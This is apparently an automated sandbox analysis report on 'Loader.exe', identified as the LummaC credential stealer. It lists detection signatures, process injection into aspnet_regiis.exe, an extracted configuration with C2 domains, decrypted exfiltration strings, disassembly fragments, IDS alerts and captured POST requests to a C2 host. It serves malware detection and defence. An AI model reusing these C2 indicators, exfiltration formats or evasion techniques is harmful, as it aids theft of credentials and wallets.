Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:Loader.exe
Analysis ID:1546098
MD5:cf19765d8a9a2c2fd11a7a8c4ba3deda
SHA1:63b5142b07b7773d4201932e7834ac11eafa1ab3
SHA256:60b98a0907f9721cf28ccd684b565f7f77a90565e9a2bd47f75c419472c25a1c
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Loader.exe (PID: 4560 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: CF19765D8A9A2C2FD11A7A8C4BA3DEDA)
    • conhost.exe (PID: 4232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 2096 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["seallysl.site", "servicedny.site", "goalyfeastz.site", "mafnufacut.cyou", "dilemmadu.site", "contemteny.site", "opposezmny.site", "authorisev.site", "faulteyotk.site"], "Build id": "HpOoIh--17a9517add07"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: Loader.exe PID: 4560JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        Process Memory Space: aspnet_regiis.exe PID: 2096JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: aspnet_regiis.exe PID: 2096JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: aspnet_regiis.exe PID: 2096JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              Click to see the 1 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T14:07:13.468749+010020229301A Network Trojan was detected172.202.163.200443192.168.2.649756TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T14:06:57.494593+010020283713Unknown Traffic192.168.2.649711104.21.41.158443TCP
              2024-10-31T14:06:59.156570+010020283713Unknown Traffic192.168.2.649712104.21.41.158443TCP
              2024-10-31T14:07:00.649369+010020283713Unknown Traffic192.168.2.649714104.21.41.158443TCP
              2024-10-31T14:07:02.067758+010020283713Unknown Traffic192.168.2.649715104.21.41.158443TCP
              2024-10-31T14:07:03.452181+010020283713Unknown Traffic192.168.2.649716104.21.41.158443TCP
              2024-10-31T14:07:05.365767+010020283713Unknown Traffic192.168.2.649718104.21.41.158443TCP
              2024-10-31T14:07:06.542858+010020283713Unknown Traffic192.168.2.649724104.21.41.158443TCP
              2024-10-31T14:07:07.633124+010020283713Unknown Traffic192.168.2.649730104.21.41.158443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T14:06:58.470442+010020546531A Network Trojan was detected192.168.2.649711104.21.41.158443TCP
              2024-10-31T14:06:59.686199+010020546531A Network Trojan was detected192.168.2.649712104.21.41.158443TCP
              2024-10-31T14:07:08.115142+010020546531A Network Trojan was detected192.168.2.649730104.21.41.158443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T14:06:58.470442+010020498361A Network Trojan was detected192.168.2.649711104.21.41.158443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T14:06:59.686199+010020498121A Network Trojan was detected192.168.2.649712104.21.41.158443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T14:07:06.993386+010020480941Malware Command and Control Activity Detected192.168.2.649724104.21.41.158443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: Loader.exeAvira: detected
              Found malware configuration
              Source: 0.2.Loader.exe.6e4f0000.3.unpackMalware Configuration Extractor: LummaC {"C2 url": ["seallysl.site", "servicedny.site", "goalyfeastz.site", "mafnufacut.cyou", "dilemmadu.site", "contemteny.site", "opposezmny.site", "authorisev.site", "faulteyotk.site"], "Build id": "HpOoIh--17a9517add07"}
              Multi AV Scanner detection for submitted file
              Source: Loader.exeReversingLabs: Detection: 42%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\gdi32.dllJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: Loader.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpString decryptor: servicedny.site
              Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpString decryptor: authorisev.site
              Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpString decryptor: faulteyotk.site
              Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpString decryptor: dilemmadu.site
              Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpString decryptor: contemteny.site
              Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpString decryptor: goalyfeastz.site
              Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpString decryptor: opposezmny.site
              Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpString decryptor: seallysl.site
              Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpString decryptor: mafnufacut.cyou
              Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033AD5AF CryptUnprotectData,3_2_033AD5AF
              Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49730 version: TLS 1.2
              Source: Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E4FCB0B FindFirstFileExW,0_2_6E4FCB0B
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1817620Ch]0_2_6E534E60
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+2BB126CDh]0_2_6E549ED0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [eax+ebx], 00000030h0_2_6E50B6D5
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edi, edx0_2_6E52BF40
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [eax]0_2_6E54E780
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov dword ptr [eax+ebx], 30303030h0_2_6E50B400
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov dword ptr [eax+ebx], 20202020h0_2_6E50B400
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, ebx0_2_6E52B43A
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [edi+ebx]0_2_6E50FC20
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax0_2_6E518CD6
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx0_2_6E526CCE
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h0_2_6E545570
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [edx+esi]0_2_6E516D60
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [ebx], dl0_2_6E51AD0D
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [ebx], dl0_2_6E51AD3E
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [eax]0_2_6E54E5F0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-7DC9E524h]0_2_6E52E5E0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax0_2_6E518D96
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp eax0_2_6E527A3E
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx0_2_6E526AE0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx-09A22FB6h]0_2_6E549BE0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edi, esi0_2_6E5290DE
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [ebx], ax0_2_6E529910
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_6E529910
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, eax0_2_6E517900
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx0_2_6E51B92B
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h]0_2_6E51A9B0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h]0_2_6E51B1AC
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx0_2_6E51B1AC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx3_2_033D137E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], cl3_2_033BEB60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_033BEB60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then lea edx, dword ptr [eax-80h]3_2_033BEB60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx+0000009Ch]3_2_033BEB60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+068F7B6Bh]3_2_033BEB60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [esi+04h], eax3_2_033BEB60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_033BEB60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx3_2_033D13D5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h]3_2_033A0130
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], dl3_2_033A0130
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h]3_2_033A0130
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx3_2_033A0130
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx3_2_033A0130
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h]3_2_033A011A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], dl3_2_033A011A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h]3_2_033A011A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx3_2_033A011A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx3_2_033A011A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, eax3_2_033CA97E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [eax+ebx*8], 7CDE1E50h3_2_033CA97E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h3_2_033CA97E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [eax]3_2_033D41F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp eax3_2_033AD5AF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, ebx3_2_033B1333
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, edx3_2_033B1B40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp edx3_2_033D33B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then xor byte ptr [ecx+ebx], bl3_2_033D33B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [eax]3_2_033D4380
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx3_2_033BCA72
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx3_2_033BCA72
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1817620Ch]3_2_033BAA60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp eax3_2_033BAA40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+2BB126CDh]3_2_033CFAD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [eax+ebx], 00000030h3_2_033912D5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp edx3_2_033D32C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then xor byte ptr [ecx+ebx], bl3_2_033D32C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h3_2_033CB170
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [edx+esi]3_2_0339C960
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_0339E996
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-7DC9E524h]3_2_033B41E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp edx3_2_033D31D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then xor byte ptr [ecx+ebx], bl3_2_033D31D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [edi+ebx]3_2_03395820
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_033BE870
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_0339E8D6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx3_2_033AC8CE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then xor byte ptr [ecx+ebx], bl3_2_033D3720
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+52B71DE2h]3_2_033D1720
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h3_2_033B5F00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, word ptr [edx]3_2_033B8F00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx-09A22FB6h]3_2_033CF7E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [esp+3Ch], 595A5B84h3_2_033D0E3A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_033BDE70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-67BC38F0h]3_2_033D1648
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx3_2_033AC6E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, dword ptr [esp+54h]3_2_033BCEDA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]3_2_033CC6D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ebx], ax3_2_033AF510
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_033AF510
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, eax3_2_0339D500
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h3_2_033BE400
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp al, 2Eh3_2_033BAC04
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_033C7CA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, esi3_2_033AECDE

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49711 -> 104.21.41.158:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49730 -> 104.21.41.158:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49712 -> 104.21.41.158:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 104.21.41.158:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49712 -> 104.21.41.158:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49724 -> 104.21.41.158:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: seallysl.site
              Source: Malware configuration extractorURLs: servicedny.site
              Source: Malware configuration extractorURLs: goalyfeastz.site
              Source: Malware configuration extractorURLs: mafnufacut.cyou
              Source: Malware configuration extractorURLs: dilemmadu.site
              Source: Malware configuration extractorURLs: contemteny.site
              Source: Malware configuration extractorURLs: opposezmny.site
              Source: Malware configuration extractorURLs: authorisev.site
              Source: Malware configuration extractorURLs: faulteyotk.site
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49714 -> 104.21.41.158:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49715 -> 104.21.41.158:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49716 -> 104.21.41.158:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 104.21.41.158:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 104.21.41.158:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49724 -> 104.21.41.158:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49730 -> 104.21.41.158:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 104.21.41.158:443
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.6:49756
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mafnufacut.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: mafnufacut.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12866Host: mafnufacut.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15112Host: mafnufacut.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19970Host: mafnufacut.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1241Host: mafnufacut.cyou
